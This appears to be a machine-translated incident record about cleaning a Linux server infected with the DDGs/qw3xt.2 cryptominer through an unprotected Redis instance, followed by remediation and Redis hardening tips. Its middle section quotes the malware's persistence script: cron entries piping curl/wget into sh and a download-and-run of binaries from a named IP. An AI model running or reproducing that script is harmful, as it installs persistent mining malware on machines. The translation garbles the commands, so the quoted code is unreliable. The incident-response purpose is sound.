Linux server is implanted DDGs, qw3xt.2 mining virus processing records

Source: Internet
Author: User

Tags: csharp bin linu Service nan inux login effective http

The phenomenon after being invaded:

Found that there are qw3xt.2 and DDGs two abnormal processes, consuming a higher cpu,kill off after a while will be re-appear.

After killing the two exception processes, we see the following process over time:

The timed script is not found in/etc/sysconfig/crotnab first, and the timed task is found in the input crontab-e.

*/5 * * * * CURL-FSSL | Sh
 Query the next in the United States, the script content is as follows:  
Export path= $PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbinecho "" >/var/spool/cron/rootecho "*/15 * * * * Curl-fssl HTT p:// | SH ">>/var/spool/cron/rootecho" */15 * * * * WGET-Q-o- | SH ">>/var/spool/cron/rootmkdir-p/var/spool/cron/crontabsecho" ">/var/spool/cron/crontabs/rootecho" */15 * * * * * CURL-FSSL | SH ">>/var/spool/cron/crontabs/rootecho" */15 * * * * WGET-Q-o- | SH ">>/var/spool/cron/crontabs/rootps auxf | Grep-v grep | grep/tmp/ddgs.3013 | | RM-RF/TMP/DDGS.3013IF [!-F "/tmp/ddgs.3013"]; Then Wget-q$ (uname-m)-o/tmp/ddgs.3013 Curl-fssl http://149.56.106. 215:8000/static/3013/ddgs.$ (uname-m)-o/tmp/ddgs.3013fichmod +x/tmp/ddgs.3013 &&/tmp/ddgs.3013ps auxf | Grep-v grep | grep Circle_mi | awk ' {print $} ' | Xargs Killps AUXF | Grep-v grep | | awk ' {print $} ' | Xargs Killps AUXF | Grep-v grep | grep | awk ' {print $} ' | Xargs Killps AUXF | Grep-v grep | grep | awk ' {print $} ' | Xargs Killps AUXF | Grep-v grep | grep | awk ' {print $} ' | Xargs Killps AUXF | Grep-v grep | grep/boot/efi/| awk ' {print $} ' | Xargs Kill#ps AUXF | Grep-v grep | grep ddg.2006 | awk ' {print $} ' | Kill#ps AUXF | Grep-v grep | grep ddg.2010 | awk ' {print $} ' | Kill

Processing method:

1. Delete the CRONTAB-E

*/5 * * * * CURL-FSSL | sh

2. Clear the password-free login content of the hacker set in/root/.ssh/authorized_keys

3. Modify the Redis password

4. Change the password of the root and login account

Security recommendations:

1. Configure the BIND option, limit the IP that can connect to the Redis server, modify the default port 6379 configuration authentication for Redis, that is, auth, set the password, and the password will be saved in the Redis configuration file in clear text

2. Configure the Rename-command configuration item "Rename_config" so that even if there is unauthorized access, it can make it more difficult for an attacker to use the CONFIG command

3. If you can block the Redis extranet in the firewall

Intrusion mode:

Collected relevant information to understand that it is using Redis vulnerability, not set password or password too simple, caused by intrusion. Specific ways can be referenced

Reids Change Password method as follows:

127.0. 0.1 6379  get requirepass # # Gets the current password set"yourpassword" # # set the current password, the service is restarted and will be the default, that is, no password;

The permanent effect method is to open the Redis profile redis.conf and find the Requirepass value to modify the password as follows:

Requirepass YourPassword  # # Note here that there must be no spaces before the line

Linux server is implanted DDGs, qw3xt.2 mining virus processing records

Related Article

Beyond APAC's No.1 Cloud

19.6% IaaS Market Share in Asia Pacific - Gartner IT Service report, 2018

Learn more >

Apsara Conference 2019

The Rise of Data Intelligence, September 25th - 27th, Hangzhou, China

Learn more >

Alibaba Cloud Free Trial

Learn and experience the power of Alibaba Cloud with a free trial worth $300-1200 USD

Learn more >

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: and provide relevant evidence. A staff member will contact you within 5 working days.